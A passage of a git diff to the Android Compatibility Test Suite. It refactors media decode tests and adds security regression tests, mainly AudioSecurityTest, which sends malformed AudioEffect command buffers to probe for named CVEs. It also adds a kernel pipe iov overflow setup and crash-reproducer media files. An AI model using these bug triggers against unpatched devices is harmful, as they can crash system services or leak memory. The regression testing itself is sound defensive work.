new VideoFormat(H264_VIDEO_FILE_NAME));
}
- @Test
public void testH264SurfaceViewLargerHeightVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new SurfaceViewFactory(),
getLargerHeightVideoFormat(new VideoFormat(H264_VIDEO_FILE_NAME)));
}
- @Test
public void testH264SurfaceViewLargerWidthVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new SurfaceViewFactory(),
@@ -107,42 +85,36 @@
}
/* <------------- Tests Using VP9 -------------> */
- @Test
public void testVP9GLViewVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new GLSurfaceViewFactory(),
new VideoFormat(VP9_VIDEO_FILE_NAME));
}
- @Test
public void testVP9GLViewLargerHeightVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new GLSurfaceViewFactory(),
getLargerHeightVideoFormat(new VideoFormat(VP9_VIDEO_FILE_NAME)));
}
- @Test
public void testVP9GLViewLargerWidthVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new GLSurfaceViewFactory(),
getLargerWidthVideoFormat(new VideoFormat(VP9_VIDEO_FILE_NAME)));
}
- @Test
public void testVP9SurfaceViewVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new SurfaceViewFactory(),
new VideoFormat(VP9_VIDEO_FILE_NAME));
}
- @Test
public void testVP9SurfaceViewLargerHeightVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new SurfaceViewFactory(),
getLargerHeightVideoFormat(new VideoFormat(VP9_VIDEO_FILE_NAME)));
}
- @Test
public void testVP9SurfaceViewLargerWidthVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new SurfaceViewFactory(),
@@ -150,14 +122,12 @@
}
/* <------------- Tests H264 with cropping -------------> */
- @Test
public void testH264GLViewCroppedVideoDecode() throws Exception {
runH264DecodeCroppedTest(
new GLSurfaceViewFactory(),
new VideoFormat(H264_CROPPED_VIDEO_FILE_NAME));
}
- @Test
public void testH264SurfaceViewCroppedVideoDecode() throws Exception {
runH264DecodeCroppedTest(
new SurfaceViewFactory(),
@@ -166,23 +136,17 @@
private void runH264DecodeAccuracyTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_AVC)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertestgolden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertestgolden);
}
private void runVP9DecodeAccuracyTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_VP9)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.vp9decodertestgolden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.vp9decodertestgolden);
}
private void runH264DecodeCroppedTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_AVC)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertest520x360golden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertest520x360golden);
}
private void runDecodeAccuracyTest(
@@ -227,8 +191,7 @@
private void validateResult(
VideoFormat videoFormat, VideoViewSnapshot videoViewSnapshot, int goldenResId) {
- final Bitmap result = checkNotNull("The expected bitmap from snapshot is null",
- getHelper().generateBitmapFromVideoViewSnapshot(videoViewSnapshot));
+ final Bitmap result = getHelper().generateBitmapFromVideoViewSnapshot(videoViewSnapshot);
final Bitmap golden = getHelper().generateBitmapFromImageResourceId(goldenResId);
final BitmapCompare.Difference difference = BitmapCompare.computeMinimumDifference(
result, golden, videoFormat.getOriginalWidth(), videoFormat.getOriginalHeight());
diff --git a/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java b/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java
index 1ce732d..fae1bb4 100644
--- a/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java
+++ b/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java
@@ -44,8 +44,6 @@
import android.os.HandlerThread;
import android.os.Looper;
import android.os.SystemClock;
-import android.support.test.InstrumentationRegistry;
-import android.support.test.runner.AndroidJUnit4;
import android.test.ActivityInstrumentationTestCase2;
import android.util.Log;
import android.util.Pair;
@@ -75,12 +73,7 @@
import javax.microedition.khronos.egl.EGLDisplay;
import javax.microedition.khronos.egl.EGLSurface;
-import org.junit.After;
-import org.junit.Before;
-import org.junit.runner.RunWith;
-
@TargetApi(16)
-@RunWith(AndroidJUnit4.class)
public class DecodeAccuracyTestBase
extends ActivityInstrumentationTestCase2<DecodeAccuracyTestActivity> {
@@ -93,12 +86,9 @@
super(DecodeAccuracyTestActivity.class);
}
- @Before
@Override
- public void setUp() throws Exception {
+ protected void setUp() throws Exception {
super.setUp();
- injectInstrumentation(InstrumentationRegistry.getInstrumentation());
- setActivityInitialTouchMode(false);
mActivity = getActivity();
getInstrumentation().waitForIdleSync();
mContext = getInstrumentation().getTargetContext();
@@ -106,9 +96,8 @@
testHelper = new TestHelper(mContext, mActivity);
}
- @After
@Override
- public void tearDown() throws Exception {
+ protected void tearDown() throws Exception {
mActivity = null;
super.tearDown();
}
@@ -128,11 +117,6 @@
return reference;
}
- public static <T> T checkNotNull(String msg, T reference) {
- assertNotNull(msg, reference);
- return reference;
- }
-
public static class SimplePlayer {
public static final long DECODE_TIMEOUT_MS = TimeUnit.SECONDS.toMillis(1) / 2;
@@ -435,8 +419,6 @@
/* Utility class for collecting common test case functionality. */
class TestHelper {
- private final String TAG = TestHelper.class.getSimpleName();
-
private final Context context;
private final Handler handler;
private final Activity activity;
@@ -491,21 +473,13 @@
}
public synchronized Bitmap generateBitmapFromVideoViewSnapshot(VideoViewSnapshot snapshot) {
- final long timeOutMs = TimeUnit.SECONDS.toMillis(10);
- final long start = SystemClock.elapsedRealtime();
handler.post(snapshot);
try {
- while (!snapshot.isBitmapReady()
- && (SystemClock.elapsedRealtime() - start < timeOutMs)) {
+ while (!snapshot.isBitmapReady()) {
Thread.sleep(100);
}
} catch (InterruptedException e) {
e.printStackTrace();
- return null;
- }
- if (!snapshot.isBitmapReady()) {
- Log.e(TAG, "Time out in generateBitmapFromVideoViewSnapshot().");
- return null;
}
return snapshot.getBitmap();
}
@@ -1191,7 +1165,8 @@
class SurfaceViewSnapshot extends VideoViewSnapshot {
private static final String TAG = SurfaceViewSnapshot.class.getSimpleName();
- private static final int PIXELCOPY_REQUEST_SLEEP_MS = 100;
+ private static final int PIXELCOPY_REQUEST_SLEEP_MS = 30;
+ private static final int PIXELCOPY_REQUEST_MAX_ATTEMPTS = 20;
private static final int PIXELCOPY_TIMEOUT_MS = 1000;
private final Thread copyThread;
@@ -1207,13 +1182,15 @@
bitmap = Bitmap.createBitmap(width, height, Config.ARGB_8888);
try {
// Wait for SurfaceView to be available.
- while (copyResult != PixelCopy.SUCCESS) {
- Thread.sleep(PIXELCOPY_REQUEST_SLEEP_MS);
+ for (int i = 0; i < PIXELCOPY_REQUEST_MAX_ATTEMPTS; i++) {
copyResult = copyHelper.request(surfaceView, bitmap);
+ if (copyResult == PixelCopy.SUCCESS) {
+ break;
+ }
+ Thread.sleep(PIXELCOPY_REQUEST_SLEEP_MS);
}
} catch (InterruptedException e) {
- Log.e(TAG, "Pixel Copy is stopped/interrupted before it finishes.", e);
- bitmap = null;
+ Log.w(TAG, "Pixel Copy is stopped/interrupted before it finishes.", e);
}
copyHelper.release();
}
@@ -1317,10 +1294,10 @@
try {
waitForByteBuffer();
} catch (InterruptedException e) {
- Log.e(TAG, e.getMessage());
- bitmap = null;
- return;
+ Log.w(TAG, e.getMessage());
+ Log.w(TAG, "ByteBuffer may contain incorrect pixels.");
}
+ // Get ByteBuffer anyway. Let the test fail if ByteBuffer contains incorrect pixels.
ByteBuffer byteBuffer = glSurfaceViewFactory.getByteBuffer();
bitmap = Bitmap.createBitmap(width, height, Bitmap.Config.ARGB_8888);
byteBuffer.rewind();
diff --git a/tests/tests/media/src/android/media/cts/MediaRecorderTest.java b/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
index 32d9eaa..dffb653 100644
--- a/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
+++ b/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
@@ -424,6 +424,17 @@
return 1;
}
+ public void testRecordAudioFromAudioSourceUnprocessed() throws Exception {
+ if (!hasMicrophone()) {
+ return; // skip
+ }
+ mMediaRecorder.setAudioSource(MediaRecorder.AudioSource.UNPROCESSED);
+ mMediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.DEFAULT);
+ mMediaRecorder.setOutputFile(OUTPUT_PATH);
+ mMediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.DEFAULT);
+ recordMedia(MAX_FILE_SIZE, mOutFile);
+ }
+
public void testGetAudioSourceMax() throws Exception {
final int max = MediaRecorder.getAudioSourceMax();
assertTrue(MediaRecorder.AudioSource.DEFAULT <= max);
diff --git a/tests/tests/os/src/android/os/cts/SecurityPatchTest.java b/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
index a857670..c5baeed 100644
--- a/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
+++ b/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
@@ -32,7 +32,7 @@
private static final String SECURITY_PATCH_DATE_ERROR =
"ro.build.version.security_patch should be \"%d-%02d\" or later. Found \"%s\"";
private static final int SECURITY_PATCH_YEAR = 2017;
- private static final int SECURITY_PATCH_MONTH = 01;
+ private static final int SECURITY_PATCH_MONTH = 05;
private boolean mSkipTests = false;
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index 7468d68..7b87851 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -25,6 +25,7 @@
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.RECORD_AUDIO" />
<application>
<uses-library android:name="android.test.runner" />
diff --git a/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp b/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp
index 25dcc9b..12c3517 100644
--- a/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp
+++ b/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp
@@ -303,14 +303,18 @@
* set up to overflow iov[OVERFLOW_BUF] on non-atomic redo in kernel
* function pipe_iov_copy_to_user
*/
- bufs[OVERFLOW_BUF] = mmap((void*)(FIXED_ADDR), PAGE_SIZE, PROT_READ | PROT_WRITE,
- MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
+ iovs[OVERFLOW_BUF - 1].iov_len = IOV_LEN*10;
+ iovs[OVERFLOW_BUF].iov_base = bufs[OVERFLOW_BUF];
+ iovs[OVERFLOW_BUF].iov_len = IOV_LEN;
+
+ overflow_addr = mmap((void *) FIXED_ADDR, PAGE_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+ bufs[OVERFLOW_BUF] = overflow_addr;
if (bufs[OVERFLOW_BUF] == MAP_FAILED) {
ALOGE("mmap fixed addr failed:%s", strerror(errno));
goto __close_pipe;
}
- iovs[OVERFLOW_BUF].iov_base = bufs[OVERFLOW_BUF];
- iovs[OVERFLOW_BUF].iov_len = IOV_LEN;
for (i = 0; i < BUFS; i++) {
if (i == OVERFLOW_BUF) {
diff --git a/tests/tests/security/res/raw/bug_33137046.mp4 b/tests/tests/security/res/raw/bug_33137046.mp4
new file mode 100644
index 0000000..01f49b2
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33137046.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33251605.bmp b/tests/tests/security/res/raw/bug_33251605.bmp
new file mode 100644
index 0000000..0060ff4
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33251605.bmp
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33300701.tiff b/tests/tests/security/res/raw/bug_33300701.tiff
new file mode 100644
index 0000000..ea7a477
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33300701.tiff
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33818508.mp4 b/tests/tests/security/res/raw/bug_33818508.mp4
new file mode 100644
index 0000000..d2f2604
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33818508.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33897722.gif b/tests/tests/security/res/raw/bug_33897722.gif
new file mode 100755
index 0000000..7a563d7
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33897722.gif
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_35467107.mp4 b/tests/tests/security/res/raw/bug_35467107.mp4
new file mode 100644
index 0000000..43ccef6
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_35467107.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_35763994.amr b/tests/tests/security/res/raw/bug_35763994.amr
new file mode 100644
index 0000000..b6d3f0e
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_35763994.amr
@@ -0,0 +1 @@
+#!AMR-WB
diff --git a/tests/tests/security/res/raw/cve_2015_6608_b_23680780.mp4 b/tests/tests/security/res/raw/cve_2015_6608_b_23680780.mp4
new file mode 100644
index 0000000..6d41ebc
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2015_6608_b_23680780.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_2507.mp4 b/tests/tests/security/res/raw/cve_2016_2507.mp4
new file mode 100644
index 0000000..ca248e1
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_2507.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_3755.mp4 b/tests/tests/security/res/raw/cve_2016_3755.mp4
new file mode 100644
index 0000000..014bd06
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_3755.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_3878_b_29493002.mp4 b/tests/tests/security/res/raw/cve_2016_3878_b_29493002.mp4
new file mode 100644
index 0000000..469a1b3
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_3878_b_29493002.mp4
Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/AudioSecurityTest.java b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
new file mode 100644
index 0000000..0d453da
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
@@ -0,0 +1,409 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.security.cts;
+
+import android.cts.util.CtsAndroidTestCase;
+import android.media.AudioFormat;
+import android.media.AudioManager;
+import android.media.AudioTrack;
+import android.media.audiofx.AudioEffect;
+import android.util.Log;
+
+import java.nio.ByteBuffer;
+import java.nio.ByteOrder;
+import java.util.Arrays;
+import java.util.UUID;
+
+public class AudioSecurityTest extends CtsAndroidTestCase {
+ private static final String TAG = "AudioSecurityTest";
+
+ private static final int ERROR_DEAD_OBJECT = -7; // AudioEffect.ERROR_DEAD_OBJECT
+
+ // should match audio_effect.h (native)
+ private static final int EFFECT_CMD_SET_PARAM = 5;
+ private static final int EFFECT_CMD_GET_PARAM = 8;
+ private static final int EFFECT_CMD_OFFLOAD = 20;
+ private static final int SIZEOF_EFFECT_PARAM_T = 12;
+
+ private static void verifyZeroReply(byte[] reply) throws Exception {
+ int count = 0;
+ for (byte b : reply) {
+ if (b != 0) {
+ count++;
+ }
+ }
+ assertEquals("reply has " + count + " nonzero values", 0 /* expected */, count);
+ }
+
+ // @FunctionalInterface
+ private interface TestEffect {
+ void test(AudioEffect audioEffect) throws Exception;
+ }
+
+ private static void testAllEffects(String testName, TestEffect testEffect) throws Exception {
+ int failures = 0;
+ for (AudioEffect.Descriptor descriptor : AudioEffect.queryEffects()) {
+ final AudioEffect audioEffect;
+ try {
+ audioEffect = (AudioEffect)AudioEffect.class.getConstructor(
+ UUID.class, UUID.class, int.class, int.class).newInstance(
+ descriptor.type,
+ descriptor.uuid, // uuid overrides type
+ 0 /* priority */, 0 /* audioSession */);
+ } catch (Exception e) {
+ Log.w(TAG, "effect " + testName + " " + descriptor.name
+ + " cannot be created (ignoring)");
+ continue; // OK;
+ }
+ try {
+ testEffect.test(audioEffect);
+ Log.d(TAG, "effect " + testName + " " + descriptor.name + " success");
+ } catch (Exception e) {
+ Log.e(TAG, "effect " + testName + " " + descriptor.name + " failed!");
+ ++failures;
+ } catch (AssertionError e) {
+ Log.e(TAG, "effect " + testName + " " + descriptor.name + " failed!");
+ ++failures;
+ }
+ }
+ assertEquals("found " + testName + " " + failures + " failures",
+ 0 /* expected */, failures);
+ }
+
+ // b/28173666
+ public void testAllEffectsGetParameterAttemptOffload_CVE_2016_3745() throws Exception {
+ testAllEffects("get parameter attempt offload",
+ new TestEffect() {
+ @Override
+ public void test(AudioEffect audioEffect) throws Exception {
+ testAudioEffectGetParameter(audioEffect, true /* offload */);
+ }
+ });
+ }
+
+ // b/32438594
+ // b/32624850
+ // b/32635664
+ public void testAllEffectsGetParameter2AttemptOffload_CVE_2017_0398() throws Exception {
+ testAllEffects("get parameter2 attempt offload",
+ new TestEffect() {
+ @Override
+ public void test(AudioEffect audioEffect) throws Exception {
+ testAudioEffectGetParameter2(audioEffect, true /* offload */);
+ }
+ });
+ }
+
+ // b/30204301
+ public void testAllEffectsSetParameterAttemptOffload_CVE_2016_3924() throws Exception {
+ testAllEffects("set parameter attempt offload",
+ new TestEffect() {
+ @Override
+ public void test(AudioEffect audioEffect) throws Exception {
+ testAudioEffectSetParameter(audioEffect, true /* offload */);
+ }
+ });
+ }
+
+ private static void testAudioEffectGetParameter(
+ AudioEffect audioEffect, boolean offload) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled
+ if (offload) {
+ byte command[] = new byte[8];
+ Arrays.fill(command, (byte)1);
+ byte reply[] = new byte[4]; // ignored
+
+ /* ignored */ AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_OFFLOAD, command, reply);
+ }
+
+ // 2) get parameter with invalid psize
+ {
+ byte command[] = new byte[30];
+ Arrays.fill(command, (byte)0xDD);
+ byte reply[] = new byte[30];
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_GET_PARAM, command, reply);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ verifyZeroReply(reply);
+ }
+
+ // NOTE: an alternative way of checking crash:
+ //
+ // Thread.sleep(1000 /* millis */);
+ // assertTrue("Audio server might have crashed",
+ // audioEffect.setEnabled(false) != AudioEffect.ERROR_DEAD_OBJECT);
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectGetParameter2(
+ AudioEffect audioEffect, boolean offload) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled
+ if (offload) {
+ byte command[] = new byte[8];
+ Arrays.fill(command, (byte)1);
+ byte reply[] = new byte[4]; // ignored
+
+ /* ignored */ AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_OFFLOAD, command, reply);
+ }
+
+ // 2) get parameter with small command size but large psize
+ {
+ final int parameterSize = 0x100000;
+
+ byte command[] = ByteBuffer.allocate(5 * 4 /* capacity */)
+ .order(ByteOrder.nativeOrder())
+ .putInt(0) // status (unused)
+ .putInt(parameterSize) // psize (very large)
+ .putInt(0) // vsize
+ .putInt(0x04030201) // data[0] (param too small for psize)
+ .putInt(0x08070605) // data[4]
+ .array();
+ byte reply[] = new byte[parameterSize + SIZEOF_EFFECT_PARAM_T];
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_GET_PARAM, command, reply);
+
+ verifyZeroReply(reply);
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectGetParameter3(AudioEffect audioEffect) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) get parameter with zero command size
+ {
+ final int parameterSize = 0x10;
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ EFFECT_CMD_GET_PARAM,
+ new byte[0] /* command */,
+ new byte[parameterSize + SIZEOF_EFFECT_PARAM_T] /* reply */);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectSetParameter(
+ AudioEffect audioEffect, boolean offload) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled
+ if (offload) {
+ byte command[] = new byte[8];
+ Arrays.fill(command, (byte)1);
+ byte reply[] = new byte[4]; // ignored
+
+ /* ignored */ AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_OFFLOAD, command, reply);
+ }
+
+ // 2) set parameter with invalid psize
+ {
+ byte command[] = ByteBuffer.allocate(5 * 4 /* capacity */)
+ .order(ByteOrder.nativeOrder())
+ .putInt(0) // status (unused)
+ .putInt(0xdddddddd) // psize (very large)
+ .putInt(4) // vsize
+ .putInt(1) // data[0] (param too small for psize)
+ .putInt(0) // data[4]
+ .array();
+ byte reply[] = new byte[4]; // returns status code (ignored)
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_SET_PARAM, command, reply);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ // on failure reply may contain the status code.
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectSetOffload(AudioEffect audioEffect) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled with zero command and reply size
+ {
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ EFFECT_CMD_OFFLOAD,
+ new byte[0] /* command */,
+ new byte[0] /* reply */);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ // should match effect_visualizer.h (native)
+ private static final String VISUALIZER_TYPE = "e46b26a0-dddd-11db-8afd-0002a5d5c51b";
+ private static final int VISUALIZER_CMD_CAPTURE = 0x10000;
+ private static final int VISUALIZER_PARAM_CAPTURE_SIZE = 0;
+
+ // b/31781965
+ public void testVisualizerCapture_CVE_2017_0396() throws Exception {
+ // Capture params
+ final int CAPTURE_SIZE = 1 << 24; // 16MB seems to be large enough to cause a SEGV.
+ final byte[] captureBuf = new byte[CAPTURE_SIZE];
+
+ // Track params
+ final int sampleRate = 48000;
+ final int format = AudioFormat.ENCODING_PCM_16BIT;
+ final int loops = 1;
+ final int seconds = 1;
+ final int channelCount = 2;
+ final int bufferFrames = seconds * sampleRate;
+ final int bufferSamples = bufferFrames * channelCount;
+ final int bufferSize = bufferSamples * 2; // bytes per sample for 16 bits
+ final short data[] = new short[bufferSamples]; // zero data
+
+ for (AudioEffect.Descriptor descriptor : AudioEffect.queryEffects()) {
+ if (descriptor.type.compareTo(UUID.fromString(VISUALIZER_TYPE)) != 0) {
+ continue;
+ }
+
+ AudioEffect audioEffect = null;
+ AudioTrack audioTrack = null;
+
+ try {
+ // create track and play
+ {
+ audioTrack = new AudioTrack(AudioManager.STREAM_MUSIC, sampleRate,
+ AudioFormat.CHANNEL_OUT_STEREO, format, bufferSize,
+ AudioTrack.MODE_STATIC);
+ assertEquals("Cannot write to audio track",
+ bufferSamples,
+ audioTrack.write(data, 0 /* offsetInBytes */, data.length));
+ assertEquals("AudioTrack not initialized",
+ AudioTrack.STATE_INITIALIZED,
+ audioTrack.getState());
+ assertEquals("Cannot set loop points",
+ android.media.AudioTrack.SUCCESS,
+ audioTrack.setLoopPoints(0 /* startInFrames */, bufferFrames, loops));
+ audioTrack.play();
+ }
+
+ // wait for track to really begin playing
+ Thread.sleep(200 /* millis */);
+
+ // create effect
+ {
+ audioEffect = (AudioEffect) AudioEffect.class.getConstructor(
+ UUID.class, UUID.class, int.class, int.class).newInstance(
+ descriptor.type, descriptor.uuid, 0 /* priority */,
+ audioTrack.getAudioSessionId());
+ }
+
+ // set capture size
+ {
+ byte command[] = ByteBuffer.allocate(5 * 4 /* capacity */)
+ .order(ByteOrder.nativeOrder())
+ .putInt(0) // status (unused)
+ .putInt(4) // psize (sizeof(param))
+ .putInt(4) // vsize (sizeof(value))
+ .putInt(VISUALIZER_PARAM_CAPTURE_SIZE) // data[0] (param)
+ .putInt(CAPTURE_SIZE) // data[4] (value)
+ .array();
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ EFFECT_CMD_SET_PARAM,
+ command, new byte[4] /* reply */);
+ Log.d(TAG, "setparam returns " + ret);
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+
+ // enable effect
+ {
+ final int ret = audioEffect.setEnabled(true);
+ assertEquals("Cannot enable audio effect", 0 /* expected */, ret);
+ }
+
+ // wait for track audio data to be processed, otherwise capture
+ // will not really return audio data.
+ Thread.sleep(200 /* millis */);
+
+ // capture data
+ {
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ VISUALIZER_CMD_CAPTURE,
+ new byte[0] /* command */, captureBuf /* reply */);
+ Log.d(TAG, "capture returns " + ret);
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } finally {
+ if (audioEffect != null) {
+ audioEffect.release();
+ }
+ if (audioTrack != null) {
+ audioTrack.release();
+ }
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/BigRleTest.java b/tests/tests/security/src/android/security/cts/BigRleTest.java
new file mode 100644
index 0000000..f3c2302
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/BigRleTest.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.BitmapFactory;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class BigRleTest extends AndroidTestCase {
+ /**
+ * Verifies that the device does not run OOM decoding a particular RLE encoded BMP.
+ *
+ * This image reports that its encoded length is over 4 gigs. Prior to fixing issue 33251605,
+ * we attempted to allocate space for all the encoded data at once, resulting in OOM.
+ */
+ public void test_android_bug_33251605() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33251605);
+ Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/Movie33897722.java b/tests/tests/security/src/android/security/cts/Movie33897722.java
new file mode 100644
index 0000000..f6859da
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/Movie33897722.java
@@ -0,0 +1,65 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
